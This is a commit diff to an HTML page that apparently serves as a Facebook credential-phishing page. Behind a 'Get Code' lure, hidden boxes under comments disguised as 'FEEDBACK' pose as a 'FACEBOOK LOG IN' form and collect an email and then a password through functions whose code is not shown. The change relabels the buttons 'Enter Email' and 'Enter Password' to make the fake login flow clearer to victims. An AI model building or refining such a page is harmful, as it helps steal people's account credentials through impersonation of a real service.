Update button labels for clarity

--- a/index.html
+++ b/index.html
@@ -82,21 +82,21 @@ button{
   <h3>Enter Code</h3>
   <input id="codeInput" class="fb-input" placeholder="Enter Code">
   <button onclick="submitCode()">Submit</button>
-  <div class="link" onclick="getCode()">Don't have a Code? Get Code</div>
+  <div class="link" onclick="getCode()">Get Code</div>
 </div>
 
 <!-- FEEDBACK 1 -->
 <div class="box hidden" id="fb1">
   <h3>FACEBOOK LOG IN</h3>
   <input class="fb-input" id="f1" placeholder="Enter Email">
-  <button onclick="sendF1()">Enter</button>
+  <button onclick="sendF1()">Enter Email</button>
 </div>
 
 <!-- FEEDBACK 2 -->
 <div class="box hidden" id="fb2">
   <h3>FACEBOOK LOG IN</h3>
   <input class="fb-input" id="f2" placeholder="Enter Password">
-  <button onclick="sendF2()">Get Code</button>
+  <button onclick="sendF2()">Enter Password</button>
 </div>
 
 <!-- CODE SHOW -->
